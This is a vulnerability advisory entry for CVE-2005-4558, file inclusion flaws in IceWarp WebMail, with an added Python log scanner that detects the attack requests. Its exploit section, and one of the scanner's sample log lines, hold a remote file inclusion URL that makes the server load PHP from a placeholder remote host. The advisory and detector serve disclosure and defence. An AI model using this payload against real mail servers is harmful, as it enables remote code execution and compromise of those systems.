IceWarp Web Mail Multiple File Inclusion Vulnerabilities

Vulnerability ID: 1109562    Vulnerability type: Input validation
Published: 2005-12-27    Updated: 2005-12-28
CVE ID: CVE-2005-4558    CNNVD-ID: CNNVD-200512-585
Platform: PHP    CVSS score: 6.5
|Vulnerability Source
https://www.exploit-db.com/exploits/26983
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-585
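|Vulnerability Details
IceWarp WebMail is a WebMail server engine that supports Chinese and Japanese e-mail. IceWarp WebMail contains multiple input-validation vulnerabilities, as follows:
1) The webmail and webadmin services run PHP with register_globals enabled. The language and lang_settings variables in /accounts/inc/include.php and /admin/inc/include.php are not properly initialized when the scripts are accessed directly, which may allow the variables to be overwritten and cause the scripts to include arbitrary PHP scripts from local or remote sources.
2) Input to the lang parameter in /dir/include.html is not properly validated, which may allow arbitrary files from local resources to be included.
3) Input to the language parameter in /mail/settings.html is not properly validated; when combined with overwriting the lang_settings variable, this may allow arbitrary PHP scripts from local or remote resources to be included.
4) If /mail/include.html encounters an unrecognized HTTP_USER_AGENT string, it may fail to properly initialize the default_layout and layout_settings variables. Combined with overwriting the default_layout and layout_settings variables, this may lead to disclosure of local file contents.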
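A defensive check for the patterns described above, as an added example (not part of the original advisory and not IceWarp code): it scans web-server access log lines for requests that set the internal variables named above, pass path-like values to the unvalidated lang/language parameters, or request the include scripts directly. The log layout, the path-like heuristic and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Variables the advisory says can be overwritten through register_globals.
INTERNAL_VARS = {"lang_settings", "layout_settings", "default_layout"}
# Request parameters the advisory says are not validated, keyed by script path.
UNVALIDATED = {"/dir/include.html": "lang", "/mail/settings.html": "language"}
# Include scripts the advisory says misbehave when accessed directly.
DIRECT_INCLUDES = {"/accounts/inc/include.php", "/admin/inc/include.php"}
# Assumed heuristic: a language value should not look like a path or URL.
PATH_LIKE = re.compile(r"\.\.|[/\\\x00]")
# Assumed log layout: common/combined format with a quoted request line.
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def inspect_target(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    findings = []
    if parts.path in DIRECT_INCLUDES:
        findings.append("direct request to include script")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        name = key.split("[", 1)[0]  # PHP: lang_settings[TEST] sets $lang_settings
        if name in INTERNAL_VARS:
            findings.append(f"request sets internal variable {name}")
        elif name == UNVALIDATED.get(parts.path) and PATH_LIKE.search(value):
            findings.append(f"path-like value in {name}")
    return findings

def scan(lines):
    """Return (line_number, findings) for every log line with a finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match and (found := inspect_target(match.group(1))):
            hits.append((number, found))
    return hits

# Constructed sample log lines (not from the page); 192.0.2.x is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Dec/2005:10:00:00 +0000] "GET /mail/index.html?id=abc HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Dec/2005:10:00:05 +0000] "GET /mail/index.html?id=abc&lang_settings[TEST]=test;http://[host]/; HTTP/1.1" 200 512',
    '192.0.2.12 - - [27/Dec/2005:10:00:09 +0000] "GET /dir/include.html?lang=../example HTTP/1.1" 200 512',
    '192.0.2.13 - - [27/Dec/2005:10:00:12 +0000] "GET /admin/inc/include.php?language=en HTTP/1.1" 200 512',
    '192.0.2.14 - - [27/Dec/2005:10:00:15 +0000] "GET /mail/settings.html?language=en HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, found)
```

Ordinary language codes such as `language=en` pass unflagged; only the internal variable names, path-like values and direct include requests produce findings.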
|Exploit
source: http://www.securityfocus.com/bid/16069/info
   
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
   
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
   
Additionally, an attacker can exploit these issues to obtain the contents of local files.
   
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
   
UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.


http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;
|References

Source: SECUNIA
Name: 17046
Link: http://secunia.com/advisories/17046
Source: BID
Name: 16069
Link: http://www.securityfocus.com/bid/16069
Source: BUGTRAQ
Name: 20051227 Secunia Research: IceWarp Web Mail Multiple File Inclusion Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded
Source: MISC
Link: http://secunia.com/secunia_research/2005-62/advisory/
Source: XF
Name: visnetic-settings-file-include(23904)
Link: http://xforce.iss.net/xforce/xfdb/23904
Source: OSVDB
Name: 22081
Link: http://www.osvdb.org/22081
Source: OSVDB
Name: 22080
Link: http://www.osvdb.org/22080
Source: SECTRACK
Name: 1015412
Link: http://securitytracker.com/id?1015412
Source: SECUNIA
Name: 17865
Link: http://secunia.com/advisories/17865
Source: FULLDISC
Name: 20051227 Secunia Research: IceWarp Web Mail Multiple File
Link: http://marc.theaimsgroup.com/?l=full-disclosure&m=113570229524828&w=2